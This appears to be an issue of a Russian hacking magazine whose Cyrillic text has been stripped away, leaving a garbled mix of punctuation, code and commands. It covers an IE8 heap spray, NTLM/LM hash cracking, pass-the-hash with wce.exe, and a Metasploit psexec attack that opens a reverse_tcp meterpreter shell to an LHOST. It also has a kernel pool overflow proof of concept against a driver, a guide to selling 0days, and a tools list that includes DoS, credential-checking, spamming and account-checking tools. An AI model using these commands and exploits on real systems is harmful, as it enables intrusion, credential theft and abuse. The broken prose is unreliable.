Internet Explorer 8 JS.


JIT-spray Flash, Java, .NET-,

.
Dave Aitel IMMUNITY ,
IE8. :
//
var
h1=new Array();
h1[0] = bigbk + shell;
for (var i = 1 ; i < 300 ; i++) {
h1[i] = h1[0].substring(0,h1[0].length )
}

:).
, .
- .

//

3
044

:
. 10
(Nessus, Retina, Xspider, etc.) , .
X 12 /143/ 10

- ,
. -, :).
, .
,
. ,
.
:
Nessus .
, :).
. , ,
.
. -
.
, .
. ,
, Nessus (tenable.com/nessus/).
,
(, :)). Nessus - . .
:

1) ;
2) Nessus Server Manager ,
;
3) ;
4) https://localhost:8834/.


(policies), (scans). Reports.
, .
, .
, .
, -,
:).

:
, - . , .
, ;
spider ; , CMS .
.
- ,
.
- ,
. ,
,
.
, -
, -, ( , ).
.
:).
,
, .
Sensepost 6
Perl BiLE-suite
X 12 /143/ 10

Nessus

(sensepost.com/cms/resources/labs/tools/misc/BiLE-suite.tgz).
BiDiBLAH.
BiLE-suite ,
DNS. BiLE.pl BiLEweigh.pl.
, ,
link:, ,
. , ,
. BiLE-weigh
,
. ; ,
,
( ).
HTTrack (httrack.com/page/2/en/index.html).
HTTrack -, BiLE
, .
HTTrack Win, *nix. BiLE-suite , , .
, BackTrack4 .
, HTTrack:
#tar xvfz httrack-3.43-9C.tar.gz
#./configure && make && su -c 'make install'

045

, webhttrack ,
, .
BiLE-weigh.pl:
:
`cat temp | sort -r -t ":" +1 -n > @ARGV[1].sorted`;
:
`cat temp | sort -r -t ":" --key=2 > @ARGV[1].sorted`;

, $mc 67
BiLE.pl. , swf-,
, HTTrack Win.
BiLE backtrack-linux.org:
perl BiLE.pl www.backtrack-linux.org BT

www.backtrack-linux.org ;
BT .
, BT.mine BT.warus,
.
:
perl BiLE-weigh.pl www.backtrack-linux.org BT.mine

: NTLM/LM

:
. , . ?
:). , .
, Windows- LSA- SAM-.
, , Windows .
NTLM LM- . , MD4 DES- .
, LSA- SAM- ( )
.
, .
,
- DLL-, SeDebugPrivilege.
.

- .

, www.backtrack-linux.org

BT.mine.sorted. , :).

, NTLM, , . ,
(, ) .
. , Windows , pwdump, ,
NTLM- challenge, smb_sniff
Metasploita (. ). ?
,
-, Cain&Abel (oxid.it/cain.html).
, ( Cracker)
:
1) ;
2) ;
3) .

. LM-,
. , -, , . , -,
7 , .
, 14 .
, ,
.
. NTLM-,
. C LM-
:
, LM- ;
15 , LM-;

cp866.

, Cain
(. ):
;
;
.

046

X 12 /143/ 10

,
Challenge. smb_relay hallenge 1122334455667788.
, , (rainbow tables). ,
habrahabr.ru/blogs/algorithm/82941/, .
,
.
, ,
.

( ), , . rtgen.exe
RainbowCrack (project-rainbowcrack.com/index.htm),
winrtgen.exe Cain. , ,
.
RainbowCrack.
, , (salt) - (, , )
.
. ,
c . NTLM-,
NTLM+challenge-.

:
WINDOWS NTLM/
LM-

logon:
>wce.exe e
10 :
>wce.exe r10
:
>wce.exe o ntlms.txt

:
, .
, , , - .
, ,
. ,
, - . , .. ,
. , NTLM,
, . . .

:). , 1997 .
Pass The Hash. .
.
. Hernan Ochoa (oss.coresecurity.
com/pshtoolkit/doc/index.html hexale.blogspot.com) ,
Metasploit.
pshtoolkit WCE:
Windows Credentials Editor (www.ampliasecurity.com/research/wce_
v1.0.tgz).
.
, WCE.
NTLM/LM- .

/ , :
> wce.exe -s user:Victim:1F27ACDE849935B0AAD3B435B5140
4EE:579110C4914
5015C47ECD267657D3174 -c "c:\Program Files\Internet
Explorer\iexplore.exe"

-s user,
Victim LM- NTLM-, - , ( ).
Metasploit, , .
pth:
msf>use exploit/windows/smb/psexec
IP :
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST 192.168.146.129
:
msf>set RHOST 192.168.0.101
, :
msf>set SMBUser
"LM:NTLM" :
msf>set SMBPass 1F27A.04EE:579.2676
:
msf>exploit

, :
>wce.exe l

Meterpreter.
z

Pass The Hash Metasploit Framework

X 12 /143/ 10

047


CISS Research Team,

WINDOWS
KERNEL POOL OVERFLOW
,
,
. ,
,
, ,
, ,
, 0day-.

Memory Management
. , ,
, , .
,
safe unlinking.
, , ,
.
.
ms08-001 - IGMPv3 Kernel Pool Overflow
tcpip.sys;
ms09-006
wmf/emf, win32k.sys;
ms10-058 integer overflow ,
tcpip.sys.

, Windows (
, ) -

048

/ . ,
. Intel x86
4096 .
. ,
ExAllocatePoolWithTag ExFreePoolWithTag, .
,
. ,
.


Paged NonPaged pool

.
. , ,
(, ?). Paged pool
(swap). NonPaged pool ,
IRQL.
pagefile.sys paged-.
, X 12 /143/ 10

Vista.
paged-.

,

. Microsoft
, Windows, Paged- NonPaged-.
NonPaged pool,
Paged-Pool .
NonPaged pool
heap. Microsoft Windows
Internals.

NonPaged pool

. ,
.

. , Windows

. , . ,
.

.
.
NonPaged lookaside ,
,
256 . (PCR), IRQL, GDT, IDT.
(PCRB)
lookaside-.
Lookaside-

.
, (
Lookaside) , .
ExInterlockedPopEntrySList

WinDbg
X 12 /143/ 10

lock. PPNPagedLookasideList
Lookaside-.
Lookaside-: P L. depth
GENERAL_LOOKASIDE ,
ListHead.
, .

P L. P depth , L, P
.

, . ,
4080 ,
lookaside- .
, POOL_DESCRIPTOR.
PoolVector
NonPagedPoolDescriptor.
,
ExpNonPagedPoolDescriptor 16
. PCRB
KNODE.
color,
ExpNonPagedPoolDescriptor. , .

ExpNumberOfNonPagedPools,
.
.
WinDbg POOL_DESCRIPTOR
(. ). spinlock' ; HAL

(pool descriptor).

. HAL
. NonPaged spinlock
(LockQueueNonPagedPoolLock). ,
spinlock.
, 4080 .
MmNonPagedPoolFreeListHead ,
.

NonPaged spinlock',
LockQueueNonPagedPoolLock.
ExFreePoolWithTag
.
.
MmNonPagedPoolFreeListHead.

HTTP://WWW
links
1. phrack.org/issues.
html?issue=65&id=4
2. Subverting VistaTM
Kernel For Fun And
Profit by Joanna
Rutkowska
invisiblethings.org/
papers/joanna%20rutkowska%20-%20subverting%20vista%20
kernel.ppt
3. Vista RC2 vs. pagefile attack by Joanna
Rutkowska
theinvisiblethings
blogspot.com/
2006/10/
vista-rc2-vs-pagefileattack-and-some.
html
4. Windows Heap
Overflows - David
Litchfield
blackhat.com/presentations/win-usa-04/
bh-win-04-litchfield/
bh-win-04-litchfield.
ppt

049


, , heap .

. , , .

(. ).


,
BugCheck' (, , BSOD'):
BAD_POOL_HEADER. ExFreePoolWithTag,
PreviousSize BlockSize
.
BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the
current request. This may or may not be due to the
caller. The internal pool links must be walked to
figure out a possible cause of
the problem,
and then special pool applied to the suspect tags or
the driver verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 812c1000, The pool entry we were looking for
within the page. <----
Arg3: 812c1fc8, The next pool entry. <----
,
Arg4: 0bf90000, (reserved)

DRIVER_CORRUPTED_EXPOOL.
ExFreePoolWithTag, unlink'e
Page Fault.
DRIVER_CORRUPTED_EXPOOL (c5)
An attempt was made to access a pageable (or
completely invalid) address at an
interrupt request level (IRQL) that is too high.
This is caused by drivers that have corrupted the
system pool. Run the driver verifier against any
new (or suspect) drivers, and if that doesn't turn
up the culprit, then use gflags to enable special
pool.
Arguments:
Arg1: 43434343, memory referenced <----- Blink'a
Arg2: 00000002, IRQL

050

POOL_DESCRIPTOR

Arg3: 00000001, value 0 = read operation, 1 = write


operation
Arg4: 80544d06, address which referenced memory

BAD_POOL_CALLER. ExFreePoolWithTag,
, , . () :

typedef struct _POOL_HEADER
{
union
{
struct
{
USHORT PreviousSize : 9;
USHORT PoolIndex : 7;
USHORT BlockSize : 9;
USHORT PoolType : 7;
}
ULONG32 Ulong1;
}
union
{
struct _EPROCESS* ProcessBilled;
ULONG PoolTag;
struct
{
USHORT AllocatorBackTraceIndex;
USHORT PoolTagHash;
}
}
} POOL_HEADER, *POOL_HEADER;
// sizeof(POOL_HEADER) == 8

PreviousSize, BlockSize :
PreviousSize = (____
+ sizeof(POOL_HEADER)) / 8
BlockSize = (___
+ sizeof(POOL_HEADER)) / 8

PoolType , , nt!_LIST_ENTRY.
kd> dt nt!_LIST_ENTRY
+0x000 Flink : Ptr32 _LIST_ENTRY
+0x004 Blink : Ptr32 _LIST_ENTRY

,
, X 12 /143/ 10


MiFreePoolPages

,
C
,

>0xFF0

false

MemoryBlock

NewMemoryBlock

true

<=0x100

<0xFF0


MmNonPagedPoolFreeListHead

-
Poolindex POOL_HEADER,
, PoolDescriptor
;
-
LIST_ENTRY

, . unlink'a.
entry :
PLIST_ENTRY b,f;
f=entry->Flink;
b=entry->Blink;
b->Flink=f;
f->Blink=b;

4 :
*() =
*(+4) =

, .
.text:00016330
mov cx, [eax]
; eax
.text:00016333
inc eax
.text:00016334
inc eax
.text:00016335
test cx, cx
.text:00016338
jnz short loc_16330
.text:0001633A
sub eax, edx
.text:0001633C
sar eax, 1
.text:0001633E
lea eax, [eax+eax+50h]
; UNICODE + 0x50
.text:00016342
movzx edi, ax
; , WORD
.text:00016345
.text:00016345 loc_16345:;
.text:00016345
movzx eax, di
.text:00016348
push ebx
.text:00016349
xor ebx, ebx
.text:0001634B
cmp eax, ebx

>0xFF0

depth
PPNPagedLookasideList
,

.text:0001634D
jz short loc_16359
.text:0001634F
push eax; -
.text:00016350
push ebx; (NonPaged)
.text:00016351
call ds:ExAllocatePool
; chunk'a
.text:00016357 mov ebx, eax
[..]
.text:000163A6 movzx esi, word ptr [edx]
.text:000163A9 mov [eax+edx], si
;
.text:000163AD inc edx
.text:000163AE inc edx
.text:000163AF test si, si
[..]
.text:000163F5 push ebx; P
.text:000163F6 call sub_12A43
.text:00012A43 sub_12A43 proc near
; CODE XREF: sub_12C9A+5Cp
.text:00012A43
.text:00012A43 P = dword ptr 4
.text:00012A43
.text:00012A43 cmp esp+P], 0
.text:00012A48 jz short locret_12A56
.text:00012A4A push 0; Tag
.text:00012A4C push [esp+4+P]; P
.text:00012A50 call ds:ExFreePoolWithTag
; , write4
C-
len = wsclen(attacker_controlled);
total_len = (2*len + 0x50) ;
size_2_alloc = (WORD)total_len; // integer wrap!!!
mem = ExAllocatePool(size_2_alloc);
....
wcscpy(mem, attacker_controlled); //
...

Number of Bytes

<0x100

(<0xFF0)&(>0x100)

MiAllocatePoolPages

PPNPagedLookasideList


X 12 /143/ 10

051

:)
ExFreePool(mem); // , , ,
, ,
,
ring0-shellcode

, , , -
. ,
- 0xffff .
BSoD
hDevice = CreateFileA("\\\\.\\KmxSbx",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL);
inbuff = (char *)malloc(0x1C000);
if(!inbuff)
{
printf("malloc failed!\n");
return 0;
}
memset(inbuff, 'A',0x1C000-1);
memset(buff+0x11032, 0x00, 2);
//end of unicode, size to allocate 0xff0
ioctl = 0x88000080;
first_dword = 0x400;
memcpy(buff, &first_dword, sizeof(DWORD));
DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff,
0x1C000, (LPVOID)inbuff, 0x100, &cb,NULL);

, . ,
( ) ( 0xffff), ExFreePoolWithTag (, ,
):

Arg4: 00000000, (reserved)


eax=00029fa8 ebx=fe8a7008 ecx=00000008 edx=fe880058
esi=00004141 edi=fe87d094
eip=f0def3a9 esp=f0011b78 ebp=f0011bac iopl=0
nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010206
KmxSbx+0x63a9:
f0def3a9 66893410
mov word ptr [eax+edx],si
ds:0023:fe8aa000=???? <---- ,

, - ,
( BSoD).

: N , DeviceIoControl, ,
- N
(0xff0 ) , ,
Page Fault (PAGE_FAULT_IN_NONPAGED_AREA).

DVD.

,
Kernel Pool Overflow. ,
, -
, , , BSoD.
,
, , .
Kernel Pool Overflow, , ,
:). Stay tuned! z

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be
protected by try-except,
it must be protected by a Probe. Typically the
address is just plain bad or it
is pointing at freed memory.

Kernel Pool Overflow


Our chunk

Header
Arguments:
Arg1: fe8aa000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write
operation.
Arg3: f0def3a9, If non-zero, the instruction address
which referenced the bad memory address.

052

Overflow

Chunk we overflow

Next
List
Header Entry
Potential list entry
depending on chunk type

,

X 12 /143/ 10

>> coding

http://lotus.xakep.ru

X-testing ontest

IBM Lotus Symphony 3.
Lotusphere 2011 !

DVD

Lotus Symphony 3

,
Lotus Symphony 3. :
, ,
! : lotus.xakep.ru.


r0064 r0064@mail.ru

WFP

Windows
Filtering Platform
WFP, Windows Vista,
(
). ,

.
WFP,
.

. Callout WFP .
, callout: classifyFn, notifyFn,
flowDeleteFn (. FWPS_CALLOUT).
classifyFn ( ): , , , / . notifyFn ( )
. -

054

. FwpsCalloutRegister,
32- .
, , .
WinDbg,
Windows Vista x64, Ida Pro,
. ()
.reload /s /n. ,
WFP,
X 12 /143/ 10

ipsblock!FlClassify ;->
NETIO!ArbitrateAndEnforce+0x3b0
NETIO!KfdClassify+0x8f1
tcpip!WfpAleClassify+0x47
tcpip! ?? ::FNODOBFM::'string'+0x178d3
tcpip!WfpAleAuthorizeConnect+0x2ef
tcpip!TcpCreateAndConnectTcbWorkQueueRoutin
e+0x4a2
tcpip!TcpCreateAndConnectTcb+0x48a
tdx!TdxConnectConnection+0x4e6
tdx!TdxTdiDispatchInternalDeviceControl+0
x158

enuma
. callout ( , ,
callout).
Call Stack
( WinDbg <Alt+6>
), ,
. ,
. Call
Stack.

links

Windows Filtering
Platform
MS:
msdn.microsoft.
com/en-us/library/
aa366510(VS.85).aspx

NETIO!ArbitrateAndEnforce (
).
.
fffffa60`00b9e9ef

add rbp,rbp

fffffa60`00b9e9f2

lock xadd dword ptr

[r12+rbp*8+80h],eax
fffffa60`00b9e9fc

cmp qword ptr [r12+80h],r9

fffffa60`00b9ea04

jne NETIO! ??

::FNODOBFM::'string'+0x6719
fffffa60`00b9ea0a

mov rax,qword ptr [NETIO!gWfpGlobal]

fffffa60`00b9ea11

cmp ebx,dword ptr [rax+970h] ; max

count
fffffa60`00b9ea17

ipsblock!FlNotify ;->

NETIO!FeNotifyFilter+0x3a
NETIO!HandleFilterFree+0x1f
NETIO!DeleteFilterFromIndex+0x22b
NETIO! ?? ::FNODOBFM::`string'+0x6f03
NETIO!IoctlKfdCommitTransaction+0x39

HTTP://WWW

jae NETIO! ??

::FNODOBFM::'string'+0x6785
fffffa60`00b9ea1d

imul rbx,rbx,38h

fffffa60`00b9ea21

add rbx,qword ptr [rax+978h]

// add callout base


fffffa60`00b9ea28

cmp dword ptr [rbx],0

// callout?
fffffa60`00b9ea2b

je NETIO! ??

::FNODOBFM::'string'+0x6785

, .
FeNotifyFilter. , :
fffffa60`00bac100
fffffa60`00bac104
fffffa60`00bac107
fffffa60`00bac10a
fffffa60`00bac10f
[rbx+2Ch]
fffffa60`00bac112
fffffa60`00bac115
NETIO!FeGetRefCallout

sub
mov
mov
lea
mov

rsp,20h
rbx,rdx
rdi,rcx
rdx,[rsp+38h]
ecx,dword ptr

mov esi,r8d
call

(fffffa60`00ba3060)
fffffa60`00bac11a
mov r8,rbx
fffffa60`00bac11d
mov rbx,qword ptr
[rsp+38h]
;
fffffa60`00bac122
mov rdx,rdi
fffffa60`00bac125
mov ecx,esi
call qword ptr
fffffa60`00bac127
[rbx+10h]
; ipsblock!FlNotify
fffffa60`00bac12a
test eax,eax

...
fffffa60`00b9eacb

lea rax,[rsp+78h]

fffffa60`00b9ead0

mov rdx,r15

fffffa60`00b9ead3

mov qword ptr [rsp+28h], rax

fffffa60`00b9ead8

mov qword ptr [rsp+20h], r12

fffffa60`00b9eadd

call qword ptr [rbx+8]

,
. ,
callout
NETIO!gWfpGlobal
.

call-stack WinDbg

.
(FlClassify).
:
X 12 /143/ 10

055


WFP msdn

ebx
.
, ebx
,
fffffa60`00b9ea11.
, ? ,
,
callout
32- ?
,
ebx. ,
- , dword ptr
[rax+970h]

( 0x11e). ebx
,
,
(
imul rbx,rbx,38h) 0x38
. qword ptr
[rax+978h]

(
WFP wdk
-).

. gWfpGlobal ( dq poi(netio!gWfpGlobal) WinDbg).
typedef struct _FW_CALLOUT_OBJECT
{
ULONG64 uFlag;
ULONG64 uClassifyFunction;
ULONG64 uNotifyFunction;
ULONG64 uFlowDeleteFunction;

056

//ULONG64 uReserved[3];
}FW_CALLOUT_OBJECT,*PFW_CALLOUT_OBJECT;
#define CALLOUT_OBJECT_SIZE 0x38
....
VOID PrintCallouts6(ULONG64 gWfpGlobal)
{
ULONG uMaxCount;
ULONG64 uCalloutBase;
PFW_CALLOUT_OBJECT pCurrentCallout;
//
uCalloutBase = *(PULONG64)(gWfpGlobal+0x978);
//
uMaxCount = *(PULONG)(gWfpGlobal + 0x970);
CHAR ModuleName[10]={0};
FLOUT(DPFLTR_IHVDRIVER_ID,
DPFLTR_ERROR_LEVEL,
"Max id count %d\n",
uMaxCount);
for(int i=0;i<uMaxCount;i++)
{
pCurrentCallout = (PFW_CALLOUT_OBJECT)
(uCalloutBase + i*CALLOUT_OBJECT_SIZE);
if(pCurrentCallout->uFlag)
{
FLOUT(DPFLTR_IHVDRIVER_ID,
DPFLTR_ERROR_LEVEL,
"Current callout 0x%I64X\n",
pCurrentCallout);
FLOUT(DPFLTR_IHVDRIVER_ID,
DPFLTR_ERROR_LEVEL,
" Notify routine 0x%I64X\n Classify
routine 0x%I64X\n Flow delete function 0x%I64X\n",
pCurrentCallout->uNotifyFunction,
pCurrentCallout->uClassifyFunction,
X 12 /143/ 10

netio.sys Ida

pCurrentCallout->uFlowDeleteFunction);
// ,
GetModuleName(ModuleName,
8,
pCurrentCallout->uClassifyFunction);
FLOUT(DPFLTR_IHVDRIVER_ID,
DPFLTR_ERROR_LEVEL,
" Module name = %s\n",
ModuleName);
RtlZeroMemory(ModuleName,sizeof(ModuleName));
}
}
}

, .
FW_CALLOUT_
OBJECT. GetModuleName ,
.
ZwQuerySystemInformation(... SystemModuleInformation...) ,
, ,
:).
, ,
, . , . ,
, , ,
, , WinDbg, u .
Notify routine 0xFFFFFA6000E113B0
Classify routine 0xFFFFFA6000E35070
Flow delete function 0x0
Module name = tcpip.sys
...
kd> u 0xFFFFFA6000E113B0 ;->
tcpip.sys?
tcpip!IPSecAleConnectCalloutNotify:
fffffa60`00e113b0 33c0
xor eax,eax
kd> u 0xFFFFFA6000E35070 ;->
tcpip.
sys?
tcpip!IPSecInboundTransportFilterCalloutClassifyV4:
mov rax,rsp
fffffa60`00e35070 488bc4

, .

Vista Windows 7

Windows 7, , ( -!). , WFP


.
netio!ProcessCallout:
X 12 /143/ 10

.text:000000000001C680 ProcessCallout proc near


; CODE XREF: ArbitrateAndEnforce+2A457
...
rax, cs:gWfpGlobal
.text:000000000001C71D mov
.text:000000000001C724 cmp
ebx, [rax+548h]
// max count
.text:000000000001C72A jnb
loc_2D270
rdi, rbx
.text:000000000001C730 mov
rdi, 6 // callout size
.text:000000000001C733 shl
.text:000000000001C737 add
rdi, [rax+550h]
// callout base
.text:000000000001C73E cmp
[rdi+4], esi
loc_2D270
.text:000000000001C741 jz
...
.text:000000000001C7E6 mov
r10, [rdi+10h]
.text:000000000001C7EA mov
rbx, qword ptr
[rsp+118h+arg_30.LockState]
.text:000000000001C7F2 mov
r8, [rsp+118h+arg_18]
.text:000000000001C7FA mov
rcx, [rsp+118h+arg_8]
.text:000000000001C802 mov
rdx, rbp
.text:000000000001C805 cmp
[rdi], esi
.text:000000000001C807 jz
loc_2D56F
.text:000000000001C80D mov
[rsp+118h+var_E8], rbx
.text:000000000001C812 mov
r9, r13
.text:000000000001C815 mov
[rsp+118h+var_F0], r14
.text:000000000001C81A mov
[rsp+118h+var_F8], rax
.text:000000000001C81F call
r10 // Classifyfn

, gWfpGlobal
WFP Win7, Vista. 0x40 (shl rdi, 6, * 2^6),
callout base ([rax+550h]) . enum
Win7 for fun :).
netio GetCalloutEntry, :
.text:000000000001CE30 GetCalloutEntry proc near
; CODE XREF: FeGetRefCallout+2057
; FeGetCalloutFlowDelete+28 ...
.text:000000000001CE30
.text:000000000001CE30 ; FUNCTION CHUNK AT
.text:0000000000028954 SIZE 0000000B BYTES
.text:000000000001CE30
rax, cs:gWfpGlobal
.text:000000000001CE30 mov
ecx, [rax+548h]
.text:000000000001CE37 cmp
// max count
.text:000000000001CE3D jnb
loc_28954
rax, [rax+550h]
.text:000000000001CE43 mov
// callout base
.text:000000000001CE4A mov
ecx, ecx
rcx, 6
.text:000000000001CE4C shl
// callout object size
.text:000000000001CE50 add
rcx, rax
.text:000000000001CE53 mov
[rdx], rcx
dword ptr [rcx+4], 0
.text:000000000001CE56 cmp
.text:000000000001CE5A jz
loc_28954
.text:000000000001CE60 rep retn
.text:000000000001CE60 GetCalloutEntry endp

, , WFP, . WFP, .
WFP WDK,

. z

057


Norseev@gmail.com



.
.
. , , ,
(
) , .
?
,

( ,
): - ,
OEP, ,
!
. ,
ImpRec, , (, ). ,
ImpRec (, , - ) , , ,
.
. ? ? ,
( ), . ,
(, Hex PE-).

058

( ) DataDirectory. (
RVA-) 80h
PE- .
IMAGE_IMPORT_DESCRIPTOR, :
struct IMAGE_IMPORT_DESCRIPTOR {
union {
DWORD Characteristics;
DWORD OriginalFirstThunk;
};
DWORD TimeDateStamp;
DWORD ForwarderChain;
DWORD Name;
DWORD FirstThunk;
}
X 12 /143/ 10

FirstThunk

IMAGE_IMPORT_
DESCRIPTOR, .

:
Name ;
FirstThunk IMAGE_THUNK_
DATA32.
.
IMAGE_THUNK_DATA32 :
struct IMAGE_THUNK_DATA32 {
union {
DWORD ForwarderString;
DWORD Function;
DWORD Ordinal;
DWORD AddressOfData;
} u1;
}


(
). .
PE-,
IMAGE_IMPORT_DESCRIPTOR, ( Name)
FirstThunk (
, ,
). ( ,
) .
FirstThunk API-.

,
,
X 12 /143/ 10

exe-. ?
,
. ThunkValue?
.
: ,
FirstThunk
, , .
FirstThunk
( ) , .
?
:
1) DataDirectory ;.
2) IMAGE_IMPORT_DESCRIPTOR FirstThunk;.
3) FirstThunk, ,
, ,
, (
),
access violation,

.
,
FirstThunk. ,
, () , ,
.


,
FirstThunk. ,
:
(, ,
DataDirectory), (- ).
? -,
; , ,
,
GetMessage, DispatchMessage, CreateWindow .. (
). -,

. ,
.
( ) .
:
, (

059

7Eh 4h FirstThunk

API-

, ). 99,9 %
, ,
HEX-. ,
. ,
.

FirstThunk
. , PE-
.
. , ASLR
, ASLR . RVA 01000000h,
.
. :
1) (
).
2)
(, user32 7Eh).
3) ;
4h
FirstThunk.
: API-?. , . : - ,
A, B, C. , C, ,
, B. API- ,
-
.
,
, .
FirstThunk . ,
API- ,
, jmp
( , ,
FirstThunk).
.
FirstThunk
.
, , .
. :
1) .

060


,
;.
2) , .
API-
( ),
FirstThunk. ,
. . ,
FirstThunk (
), .
3) , ,
. .

, , ( ,
IMAGE_IMPORT_DECRIPTOR
) .
,
. 2040h (
FirstThunk). Ch (
IMAGE_IMPORT_DESCRIPTOR, ). 204Ch kernel32.dll (
). 4
FirstThunk
kernel32 ( 2000h).
FirstThunk (, ,
, ).
GetModuleHandleA,
5009h, 2, 5007h. FirstThunk.
.
(, , ). , . ,
IMAGE_IMPORT_DESCRIPTOR (
FirstThunk ), N
, (N+1)*14h .

DataDirectory
.

. , , (
).

? ,
,
X 12 /143/ 10

FirstThunk

, ,
. ,
. z

,
API-
(,
), .
,

. LordPE.
,
Resource Binder,
.

LordPE RVA

X 12 /143/ 10

061


, Digital Security a.sintsov@dsec.ru



,
-, Android
.. .. ,
, -. ,
, , ,
.

,
. ,
, ,
, , , ,
, ,
, ,

062

(, ). ,
, ,

PCI DSS, , , .

. ,
X 12 /143/ 10

, - -. ,
,
, :).

- ( ):
1. // - - .
-. , - ,
, . - . , - ,
, --. ,
:).
( ),
. ,
(

, , , ).
2. -.
1 ,
:). -
-, ,
/ (0day) - $$$.
, .
, , ; ,
...
3. .
,
- .
.
IDS/IPS-,
- . , ,
,
PR ( ) .
, ,
.
, ,
3, .

0day

, 0day.
,
. ,
unsecurityresearch.com. ,
0day- 1000/2000 . ,
30000 . ,
. , , ZDI (Zero
Day Initiative zerodayinitiative.com),
.
, ZDI ,
X 12 /143/ 10

- ZDI
, ( ).
, ZDI ( , TippingPoint, ZDI) PWN to OWN CanSecFest,
.
.

ZDI

TippingPoint
3COM ( , , Hewlett-Packard) IPS, 0day-.
IPS , . ,
ZDI
. , , ZDI
-
. , 0day- ZDI,
TippingPoint
. , ,
.
.
, -

273
, .
, ,
, ZDI
. , PoC-, , ,
, ( , ,
).

NSS -
- -. -0day- Metasploit. , ,
, .

, ,
; ZDI , iDefense
labs.idefense.com, SecuriTeam securiteam.com NetraGard
netragard.com. , FireFox
Google Chrome . ,
, code execution ZDI.

063

...

, . ,
,
. ][ ActiveX-. ,
- , , . , . ZDI ,
:

, ...
Register. ! e-mail, . , ,
Referal. ,
:). 0day, , , ,
, 2500 ( ),
asintsov,
:). , .
My Account .
My Profile. ,
, . ,
, , , , ,
, ZDI . ,
, - , PGP-
e-mail' ZDI. , , e-mail'.
.
Copy of Government
Issued ID. , PDF-, , ,
( ) .
zdi@3com.com,
https://www.zerodayinitiative.com/documents/
zdi-pgp-key.asc ( , ).
, ,
, .
,
. : Western Union, .
WU , ,
. ;
(, ), , SWIFT . ,
. . ,
,
. ,
,
, .

,
,

, XSS-, LFI- SQL-


. , ,
,
. FTP/-,
, , , ActiveX
, ..
, ,
, .
, , ... . , . ,
. Crash-PoC
,
.
, ZDI , ,
. ,
, , .
, ,
.

1.
( ),
ZDI. . ,
. zerodayinitiative.com,
.
Researcher Login. , -

064

X 12 /143/ 10

, . ,
, , , .

2.
, ,
, ? Open
Case . ,
. ,
,
(, ),
(, - ..). ,
, , . ,
, ,
. e-mail'
- -,

. . ,
, , , .
My Cases ,
, .
My Cases
-
, , ,
,
, ZDI.

.
ZDI.
2500 , 2500 ,
.

. ? , , 10000 ,
, 20000 ,
35000 , , 50 000 . ,
@WTFuzz .
,

. .
:
+10%

$1000

X 12 /143/ 10

. ,
, :)

:
+15%

+25%
$5000
( + )
DEFCON -

:
+20%

+50%
$10000
( + )
BlackHat DEFCON -

:
+25%

+100%
$20000
( + )
BlackHat DEFCON - +
BlackHat

, . ,
, .
ActiveX-,
COMRaider', 2500 3000 .
,
. ZDI .
...

- , ZDI. - , ,
/-/ ,
, ZDI . , . ! z

065


icq 884888, http://snipper.ru

X-TOOLS
,

Sourceforge hyenae.
sourceforge.net.

: Puff
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Cosimo Oliboni

!
, Puff
members.fortunecity.it/
blackvisionit/PUFFV200.HTM.


,
-
(
).
?
,
zip-,
:). !
,
,
Puff. , Puff
,

.
Puff
:
(BMP, JPG, PCX, PNG, TGA);
(AIFF, MP3, NEXT/SUN, WAV);
(3GP, MP4, MPG, VOB);
(FLV, SWF);
,
(EXE, DLL).

:
, ,
(CAST-256, IDEA-NXT, SAFER,
RIJNDAEL, MARS, RC6, SERPENT, TWOFISH
).
:
;
(512-
);

512 ;
;
.

066

: Hyenae
: *nix/win
: Robin Richter



:). , Hyenae
, Ethernet (MITM, DoS DDoS).


.
, ,
, IP .

:

ARP-Request ;
ARP-Cache ;
PPPoE-;
PPPoE-;
ICMP-Echo ;
ICMP-Smurf ;
TCP- ICMP;
TCP-SYN ;
TCP-Land ;
TCP-;
UDP-;
DNS-Query ;
DHCP-Discover ;
DHCP ;
DHCP-Release;
Cisco HSRP active .

Hyenae
IPv4/IPv6,
,
, ,
.

: CmosPwd
: *nix/win
: Christophe Grenier


BIOS.


CmosPwd,
, cmos
BIOS SETUP.
BIOS':
ACER/IBM BIOS;
AMI BIOS;
AMI WinBIOS 2.5;
Award 4.5x/4.6x/6.0;
Compaq (1992);
Compaq (New version);
IBM (PS/2, Activa, Thinkpad);
Packard Bell;
Phoenix 1.00.09.AC0 (1994), a486 1.03,
1.04, 1.10 A03, 4.05 rev 1.02.943, 4.06
rev 1.13.1107;
Phoenix 4 release 6 (User);
Gateway Solo - Phoenix 4.0 release 6;
Toshiba;
Zenith AMI.


, ,
/
cmos.
CmosPwd:
cmospwd.exe [/d] // cmos ascii +

cmospwd.exe [/d] /[rlw] cmos__
////
cmos
cmospwd.exe /k // cmos
cmospwd.exe /m[01]* //


cgsecurity.org/
cmospwd.txt,
cgsecurity.org/wiki/CmosPwd.

: DSGood Checker
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: NightEagle
X 12 /143/ 10




DSGood Checker.

/
:
1. ( :
ip:login;pass);
2. (
);
3. ;
4. ;
5.
.
:
;
;
.NET Framework
3.5;
- ;
,
;
.


forum.
asechka.ru/showthread.php?t=120148.

: The spamer from


Reliable
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Reliable

,
.
: ,
e-mail -.
:
e-mail;
;
e-mail-;
;
(
mail-);
;
;
X 12 /143/ 10


;

;

;
SMTP-;
(, , );
;
(
);
.Net Framework 2.0.

SMTP-
(
smtp.ini):
smtp.mail.ru, smtp.inbox.ru, smtp.
bk.ru, smtp.list.ru, smtp.yandex.ru,
smtp.rambler.ru, smtp.hotmail.com,
smtp.gmail.com


: icq-email-vkontakte.ru/forum/
showthread.php?t=4788.
P.S. , !

.

: Poker Checker
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: DDM


Poker Checker.
(
Windows-) / -,
:).


,
Poker
.

:
fulltiltpoker.com, pokerstars.
com, partypoker.com, titanpoker.
com, pacificpoker.com, redstarpoker.

Windows XP
com, leonpoker.com, noblepoker.com,
williamhillpoker.com, heypoker.com

,
5 7 ,

.

: Half-open limit fix


(patch) for Windows
